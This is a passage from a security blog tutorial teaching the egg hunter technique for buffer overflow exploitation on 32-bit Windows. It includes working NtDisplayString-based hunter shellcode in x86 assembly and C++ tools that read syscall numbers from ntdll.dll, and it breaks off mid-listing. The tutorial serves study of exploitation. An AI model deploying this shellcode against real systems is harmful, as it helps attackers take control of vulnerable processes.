<!DOCTYPE html><html lang="en-us" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[Learning] Egg Hunter — From Scratch to Exploit | ISSAC/iss4cf0ng's blog</title><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="[Learning] Egg Hunter — From Scratch to Exploit | ISSAC/iss4cf0ng's blog"><meta name="twitter:image" content="https://iss4cf0ng.github.io/images/meme/Wallpaper/MyArt/3.png"><meta property="og:title" content="[Learning] Egg Hunter — From Scratch to Exploit"><meta property="og:image" content="https://iss4cf0ng.github.io/images/meme/Wallpaper/MyArt/3.png"><meta property="og:url" content="https://iss4cf0ng.github.io/2026/09/12/2026-9-12-EggHunter/index.html"><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><script async src="https://www.googletagmanager.com/gtag/js?id=G-RQ7HTMYT8W"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-RQ7HTMYT8W');</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ISSAC/iss4cf0ng's blog" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/About/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/Alien/"><span class="navItemTitle">Alien</span></a></li><li class="navItem"><a class="navBlock" href="/Arsenal/"><span class="navItemTitle">Arsenal</span></a></li><li class="navItem"><a class="navBlock" href="/2026/01/28/2026-1-28-ToolsDuplexSpy-v2-0-0/"><span class="navItemTitle">DuplexSpy</span></a></li><li class="navItem"><a class="navBlock" href="/Notes/"><span class="navItemTitle">Notes</span></a></li><li class="navItem"><a class="navBlock" href="/Series/"><span class="navItemTitle">Series</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[Learning] Egg Hunter — From Scratch to Exploit</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-09-11T17:25:05.000Z" id="date"> 2026-09-12</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-09-12T16:00:21.699Z" id="updated"> 2026-09-13</time></div></span><br><span>Word Count: <div class="control">3.7k</div></span><br><span>Read Time: <div class="control">23 min</div></span></div></div><hr><div id="post-content"><h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>This article in part of my series: <strong><a href="/FromBugToExploit/">From Bug To Exploit</a></strong>.</p>
<p>In this article, I will introduce the concepts of Egg Hunter shellcode and provide demonstrations.</p>
<blockquote>
<p>Murmur: Originally, I planned to introduce Egg Hunter technique while exploiting <code>CVE-2014-4158</code>. I then decided to separating them because I think the Egg Hunter technique is worth a single blog post!</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/meme/rio_crying.jpg'><img src="/images/meme/rio_crying.jpg" width=250/>
</p>

<h1 id="Egg-Hunter"><a href="#Egg-Hunter" class="headerlink" title="Egg Hunter"></a>Egg Hunter</h1><p><strong>Egg Hunter</strong> is actually a game played during Easter. Somehow, researchers adopted the name for a technique used in buffer overflow exploitation.</p>
<p>The core mechanism is to use a two-stage shellcode. The first stage is the <strong>Hunter</strong>; the second stage is the <strong>Egg</strong>.</p>
<p>In some scenarios, a vulnerable application does not have a large enough buffer to load the full shellcode. Alternatively, the address of the shellcode may not be constant when it is loaded. In these cases, we can apply the Egg Hunter technique to overcome these issues by loading both the Hunter and the Egg Into memory and having the Hunter locate and execute the Egg.</p>
<p>The major headache is the extremely large memory space. Every 32-bit Windows application “believes” it has a 4-GB memory space. Searching for specific shellcode across a large memory space, while avoiding invalid memory regions and doing so as quickly as possible, can be very difficult.</p>
<p>After several generations of development, researchers introduced many useful techniques. In this article, I will use the techniques introduced by <code>skape</code>.</p>
<blockquote>
<p>Murmur: I believe it is worth studying other legacy methods to understand how assembly works, but I will save them for future articles.</p>
</blockquote>
<h1 id="NtDisplayString"><a href="#NtDisplayString" class="headerlink" title="NtDisplayString"></a>NtDisplayString</h1><p>A hunter acts as a tiny first-stage scanner. It searches process memory for a uniqute 4-byte tag repeated twice (e.g., <code>R0CKR0CK</code>) that we have prepended to our actual shellcode.</p>
<p>The hunter invokes the <code>NtDisplayString</code> system call to check whether a memory page is accessible.</p>
<blockquote>
<p>Note: Sometimes, if we use other functions to read memory, they might cause an exception (access violation) because the memory region may not be readable. The system call handles this condition and returns the appropriate status, allowing the hunter to catch the error, skip to the next valid memory page, and continue scanning without crashing the application.</p>
</blockquote>
<p>Once it finds the double-tag sequence in memory, it redirects execution straight to our main payload (the Egg).</p>
<p>The Egg Hunter shellcode can be implemented as follows:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-comment">; hunter_ntdisplay.asm</span><br><span class="hljs-comment">; nasm egghunter.asm -o egghunter.bin</span><br><span class="hljs-comment">; xxd -i egghunter.bin</span><br><br>[<span class="hljs-meta">BITS</span> <span class="hljs-number">32</span>]<br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_inc_page:</span><br>    <span class="hljs-keyword">or</span> <span class="hljs-built_in">dx</span>, <span class="hljs-number">0x0fff</span>       <span class="hljs-comment">; set the value of edx to the boundary of the memory page minus 1 (4096-1)</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_inc_one:</span><br>    <span class="hljs-keyword">inc</span> <span class="hljs-built_in">edx</span>             <span class="hljs-comment">; e.x. 0x12340ffff -&gt; 0x12341000</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_check:</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-built_in">edx</span>            <span class="hljs-comment">; push edx into the stack</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-number">0x43</span>           <span class="hljs-comment">; push 0x43 (kernel index of NtDisplayString)</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span>             <span class="hljs-comment">; pop 0x43 into eax</span><br>    <span class="hljs-keyword">int</span> <span class="hljs-number">0x2e</span>            <span class="hljs-comment">; syscall</span><br>    <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">al</span>, <span class="hljs-number">0x05</span>        <span class="hljs-comment">; is 0xc0000005 (ACCESS_VIOLATION) ?</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edx</span>             <span class="hljs-comment">; restore edx</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_check_8_valid:</span><br>    <span class="hljs-keyword">je</span> loop_inc_page    <span class="hljs-comment">; if ACCESS_VIOLATION has been raised, then move to next memory page</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">is_egg:</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-number">0x50905090</span> <span class="hljs-comment">; a tag for our egg (main payload)</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edi</span>, <span class="hljs-built_in">edx</span>        <span class="hljs-comment">; move the value of edx into edi</span><br>    <span class="hljs-keyword">scasd</span>               <span class="hljs-comment">; validate the tag =&gt; if yes: edi = edi + 4</span><br>    <span class="hljs-keyword">jnz</span> loop_inc_one    <span class="hljs-comment">; if not: jump to loop_inc_one, continue scanning</span><br><br>    <span class="hljs-keyword">scasd</span>               <span class="hljs-comment">; compare eax and [edi] (compare twice in total)</span><br><br>    <span class="hljs-keyword">jnz</span> loop_inc_one    <span class="hljs-comment">; if not matched, jump to loop_inc_one</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">matched:</span><br>    <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">edi</span>             <span class="hljs-comment">; if matched, then this is the egg!</span><br></code></pre></td></tr></table></figure>
<p>There are several details worth discussing.</p>
<h2 id="0x43"><a href="#0x43" class="headerlink" title="0x43"></a><code>0x43</code></h2><p>The first one is the value <code>0x43</code>. It is a syscall number (or System Service ID). It represents the function <code>NtDisplayString</code>.</p>
<p>The kernel cannot identify the string <code>NtDisplayString</code>. Instead, it identifies system services by their syscall numbers.</p>
<p>The value <code>0x43</code> does not remain constant across all Windows operating systems. You can find all the syscall numbers on <a target="_blank" rel="noopener" href="https://j00ru.vexillium.org/syscalls/nt/32/">this website</a>.</p>
<p>You don’t have to memorize all these numbers! Instead, we can find the number in the following ways.</p>
<p>The first method is using WinDbg.</p>
<blockquote>
<p>Murmur: Since I had been failing to install WinDbg on Windows XP, I am going to demonstrate it on Windows 10 x64…</p>
</blockquote>
<p>Attach WinDbg to <code>explorer.exe</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/1.png'><img src="/images/article/2026-9-12-EggHunter/1.png" width=800/>
</p>

<p>Enter the command below:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">u ntdll!NtDisplayString L8<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/2.png'><img src="/images/article/2026-9-12-EggHunter/2.png" width=800/>
</p>

<p>The program executes <code>syscall</code> after calling <code>mov eax, 0DCh</code>. Therefore, we can assume that <code>0xDC</code> is the syscall number of <code>NtDisplayString</code> on Windows 10. If the release or edition of your Windows 10 is different from mine, you might get a different value.</p>
<blockquote>
<p>Note: The letter <code>h</code> in <code>0DCh</code> is not a hexadecimal digit. Instead, it indicates that the value is hexadecimal, similar to the <code>0x</code> prefix. The notation with the <code>h</code> suffix is actually the same as that used in <strong>Verilog</strong>.</p>
</blockquote>
<p>However, you might not be able to install WinDbg on Windows XP (like me)… Don’t worry! I will provide you with another approach!</p>
<p align="center" class='item-img' data-src='/images/meme/Rio/7.png'><img src="/images/meme/Rio/7.png" width=250/>
</p>

<p>Anyway! Let’s see how <code>NtDisplayString</code> is located in <code>ntdll.dll</code>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">4c8bd1              mov     r10,rcx<br>b8dc000000          mov     eax,0DCh<br>f604250803fe7f01    test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1<br>7503                jne     ntdll!NtDisplayString+0x15 (00007ffa`72a6f115)<br>0f05                syscall<br>c3                  ret<br>cd2e                int     2Eh<br>c3                  ret<br></code></pre></td></tr></table></figure>
<p>The opcode of <code>mov eax,0DCh</code>: <code>b8dc000000</code>. We can see that this instruction starts with <code>\xb8</code>.</p>
<p>Therefore, we can write a simple C++ program to find the syscall number of a function in <code>ntdll.dll</code>:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-comment">// find_syscall_x86.cpp</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iostream&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iomanip&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>** argv)</span></span><br><span class="hljs-function"></span>&#123;<br>	std::cout &lt;&lt; <span class="hljs-string">&quot;-----------------------------------------&quot;</span> &lt;&lt; std::endl;<br>	std::cout &lt;&lt; <span class="hljs-string">&quot;          Syscall number finder          &quot;</span> &lt;&lt; std::endl;<br>	std::cout &lt;&lt; <span class="hljs-string">&quot;-----------------------------------------&quot;</span> &lt;&lt; std::endl;<br><br>    <span class="hljs-keyword">if</span> (argc &lt; <span class="hljs-number">2</span>)<br>    &#123;<br>        std::cout &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;Example: &quot;</span> &lt;&lt; argv[<span class="hljs-number">0</span>] &lt;&lt; <span class="hljs-string">&quot; NtDisplayString&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; std::endl;<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>	<br>	HMODULE hNtDll = <span class="hljs-built_in">GetModuleHandleA</span>(<span class="hljs-string">&quot;ntdll.dll&quot;</span>);<br>	<span class="hljs-keyword">if</span> (INVALID_HANDLE_VALUE == hNtDll || <span class="hljs-literal">NULL</span> == hNtDll)<br>    &#123;<br>		hNtDll = <span class="hljs-built_in">LoadLibrary</span>(<span class="hljs-string">&quot;ntdll.dll&quot;</span>);<br>	&#125;<br>	<br>	<span class="hljs-keyword">if</span> (INVALID_HANDLE_VALUE == hNtDll || <span class="hljs-literal">NULL</span> == hNtDll)<br>    &#123;<br>		std::cout &lt;&lt; <span class="hljs-string">&quot;[-] Cannot load ntdll.dll&quot;</span> &lt;&lt; std::endl;<br>		<span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>	&#125;<br><br>    <span class="hljs-function">std::string <span class="hljs-title">target</span><span class="hljs-params">(argv[<span class="hljs-number">1</span>])</span></span>;<br>	<br>	FARPROC pTarget = <span class="hljs-built_in">GetProcAddress</span>(hNtDll, target.<span class="hljs-built_in">data</span>());<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">NULL</span> == pTarget)<br>    &#123;<br>		std::cout &lt;&lt; <span class="hljs-string">&quot;[-] Cannot find the method: &quot;</span> &lt;&lt; target &lt;&lt; std::endl;<br>		<span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>	&#125;<br>	<br>	std::cout &lt;&lt; <span class="hljs-string">&quot;[+] Address of NtDisplayString: 0x&quot;</span> &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">8</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (DWORD)pTarget &lt;&lt; std::endl;<br>	<br>	BYTE* code = (BYTE*)pTarget;<br>	<span class="hljs-keyword">if</span> (code[<span class="hljs-number">0</span>] == <span class="hljs-number">0xB8</span>)<br>    &#123;<br>		DWORD nSyscall = *(DWORD*)(code + <span class="hljs-number">1</span>);<br><br>        std::cout &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;[+] Detected value:&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;\t-&gt; Machine code: B8 &quot;</span> <br>                  &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">1</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">2</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">3</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">4</span>] &lt;&lt; <span class="hljs-string">&quot; (mov eax, 0x&quot;</span> &lt;&lt; nSyscall &lt;&lt; <span class="hljs-string">&quot;)&quot;</span> &lt;&lt; std::endl;<br><br>        std::cout &lt;&lt; <span class="hljs-string">&quot;\t-&gt; Syscall number of NtDisplayString: 0x&quot;</span> &lt;&lt; std::hex &lt;&lt; nSyscall &lt;&lt; std::endl &lt;&lt; std::endl;<br>	&#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>        std::cout &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;[-] Cannot find any value...&quot;</span> &lt;&lt; std::endl;<br>    &#125;<br>	<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>And the x64 version is implemented as follows:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-comment">// find_syscall_x64.cpp</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iostream&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iomanip&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>** argv)</span></span><br><span class="hljs-function"></span>&#123;<br>    std::cout &lt;&lt; <span class="hljs-string">&quot;-----------------------------------------&quot;</span> &lt;&lt; std::endl;<br>    std::cout &lt;&lt; <span class="hljs-string">&quot;          Syscall number finder          &quot;</span> &lt;&lt; std::endl;<br>    std::cout &lt;&lt; <span class="hljs-string">&quot;-----------------------------------------&quot;</span> &lt;&lt; std::endl;<br><br>    <span class="hljs-keyword">if</span> (argc &lt; <span class="hljs-number">2</span>)<br>    &#123;<br>        std::cout &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;Example: &quot;</span> &lt;&lt; argv[<span class="hljs-number">0</span>] &lt;&lt; <span class="hljs-string">&quot; NtDisplayString&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; std::endl;<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>	<br>    HMODULE hNtDll = <span class="hljs-built_in">GetModuleHandleA</span>(<span class="hljs-string">&quot;ntdll.dll&quot;</span>);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-literal">NULL</span> == hNtDll || INVALID_HANDLE_VALUE == hNtDll)<br>    &#123;<br>        hNtDll = <span class="hljs-built_in">LoadLibraryA</span>(<span class="hljs-string">&quot;ntdll.dll&quot;</span>);<br>    &#125;<br>	<br>    <span class="hljs-keyword">if</span> (<span class="hljs-literal">NULL</span> == hNtDll || INVALID_HANDLE_VALUE == hNtDll)<br>    &#123;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;[-] Cannot load ntdll.dll&quot;</span> &lt;&lt; std::endl;<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br><br>    <span class="hljs-function">std::string <span class="hljs-title">target</span><span class="hljs-params">(argv[<span class="hljs-number">1</span>])</span></span>;<br>	<br>    FARPROC pTarget = <span class="hljs-built_in">GetProcAddress</span>(hNtDll, target.<span class="hljs-built_in">data</span>());<br>    <span class="hljs-keyword">if</span> (<span class="hljs-literal">NULL</span> == pTarget)<br>    &#123;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;[-] Cannot find the method: &quot;</span> &lt;&lt; target &lt;&lt; std::endl;<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>	<br>    std::cout &lt;&lt; <span class="hljs-string">&quot;[+] Address of &quot;</span> &lt;&lt; target &lt;&lt; <span class="hljs-string">&quot;: 0x&quot;</span> <br>              &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-built_in">sizeof</span>(<span class="hljs-type">void</span>*) * <span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) <br>              &lt;&lt; (DWORD_PTR)pTarget &lt;&lt; std::endl;<br>	<br>    BYTE* code = (BYTE*)pTarget;<br>    DWORD nSyscall = <span class="hljs-number">0</span>;<br>    <span class="hljs-type">bool</span> bSuccess = <span class="hljs-literal">false</span>;<br><br>    <span class="hljs-keyword">if</span> (code[<span class="hljs-number">0</span>] == <span class="hljs-number">0x4C</span> &amp;&amp; code[<span class="hljs-number">1</span>] == <span class="hljs-number">0x8B</span> &amp;&amp; code[<span class="hljs-number">2</span>] == <span class="hljs-number">0xD1</span> &amp;&amp; code[<span class="hljs-number">3</span>] == <span class="hljs-number">0xB8</span>)<br>    &#123;<br>        nSyscall = *(DWORD*)(code + <span class="hljs-number">4</span>);<br>        bSuccess = <span class="hljs-literal">true</span>;<br><br>        std::cout &lt;&lt; std::endl &lt;&lt; <span class="hljs-string">&quot;[+] Detected x64 Native Pattern:&quot;</span> &lt;&lt; std::endl;<br>        std::cout &lt;&lt; <span class="hljs-string">&quot;\t-&gt; Machine code: 4C 8B D1 B8 &quot;</span> <br>                  &lt;&lt; std::hex &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">4</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">5</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">6</span>] &lt;&lt; <span class="hljs-string">&quot; &quot;</span><br>                  &lt;&lt; std::<span class="hljs-built_in">setw</span>(<span class="hljs-number">2</span>) &lt;&lt; std::<span class="hljs-built_in">setfill</span>(<span class="hljs-string">&#x27;0&#x27;</span>) &lt;&lt; (<span class="hljs-type">int</span>)code[<span class="hljs-number">7</span>] <br>                  &lt;&lt; <span class="hljs-string">&quot; (mov r10, rcx; mov eax, 0x&quot;</span> &lt;&lt; nSyscall &lt;&lt; <span 